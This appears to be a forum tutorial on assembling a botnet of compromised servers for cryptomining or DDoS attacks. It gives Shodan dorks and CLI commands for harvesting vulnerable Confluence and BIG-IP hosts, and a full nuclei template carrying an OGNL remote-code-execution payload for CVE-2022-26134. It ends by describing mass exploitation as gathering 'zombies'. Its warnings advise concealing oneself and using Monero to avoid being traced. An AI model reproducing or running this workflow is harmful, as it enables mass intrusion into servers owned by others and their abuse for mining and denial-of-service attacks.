This tutorial is designed for individuals seeking to explore and elucidate the procedures for accumulating these resources for the practice of crypto-mining activities or distributed denial of service (DDoS) attacks, alongside other applications requiring a considerable number of compromised personal computers and virtual private servers (PCs / VPS).
REQUISITES
1. Shodan account having membership, membership fee for Shodan at £35 GBP or obtainable free in case of ".edu" email.
2. VPN (e.g. Mullvad).
3. Basic scripting aptitude.
WARNING
- DO NOT employ this technique without improperly concealing oneself.
- DO NOT endeavour in this without being fully aware of the consequences.
- DO NOT establish a connection via 'Secure Shell' to any compromised device from your local Computer.
- DO NOT engage in mining to your Bitcoin wallet (Monero only).
This is a fundamental process, not advanced.
TUTORIAL
1. First and foremost, secure your Shodan membership and VPN configuration.
2. Conduct a search for newly discovered CVEs (RCE only) and familiarise yourself with their workings. Thoroughly study each to increase your understanding.We shall utilise two CVEs for this thread:
- CVE-2022-26134 [X-Confluence]
- CVE-2022-1388 [BIG-IP Firewall]
Review both CVEs and the corresponding Proof of Concept available on GitHub.
3. Once comprehension is achieved, construct a Shodan dork using unique identifiers for these targeted services:
- Dork for CVE-2022-26134 [ X-Confluence]
- Dork for CVE-2022-1388 [ http.title:"BIG-IP®-+Redirect"]
Utilise these dorks to execute a Shodan search.
4. We shall utilise Shodan CLI to obtain IPs related to this service:
Code: Select all
shodan search "X-Confluence" --fields ip_str,port --separator : --limit 100 > hosts.txtAt this point, you should perceive a list of IPs along with their corresponding ports.
5. We shall employ "httprobe" or "httpx" to discern live hosts:
Code: Select all
cat hosts | httprobe -c 50 | tee live_hosts.txt6. We shall employ Nucli to automatise testing for potential vulnerabilities extant. As we are currently engaging with the inaugural CVE, namely "Confluence", we shall utilise this template:
Code: Select all
info:
name: Confluence - Remote Code Execution
author: pdteam,jbertman
severity: critical
description: |
Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.
reference:
- https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
- https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
- https://jira.atlassian.com/browse/CONFSERVER-79016
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-26134
cwe-id: CWE-74
metadata:
shodan-query: http.component:"Atlassian Confluence"
verified: "true"
tags: cve,cve2022,confluence,rce,ognl,oast,cisa
requests:
- method: GET
path:
- "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionCont
ext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
- "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"
stop-at-first-match: true
req-condition: true
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains(to_lower(all_headers_1), "x-cmd-response:")'
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(to_lower(response_2), "confluence")'
condition: and
extractors:
- type: kval
part: header
kval:
- "x_cmd_response"
# Enhanced by mp on 2022/07/04Save it under the designation "attack.yaml".
7. We shall now pass live hosts to this templates:
Code: Select all
cat live_hosts.txt | nucli -bs 50 -c 50 -t attack.yamlAt this point, one should patiently anticipate observing the emergence of one's zombies before their very gaze.
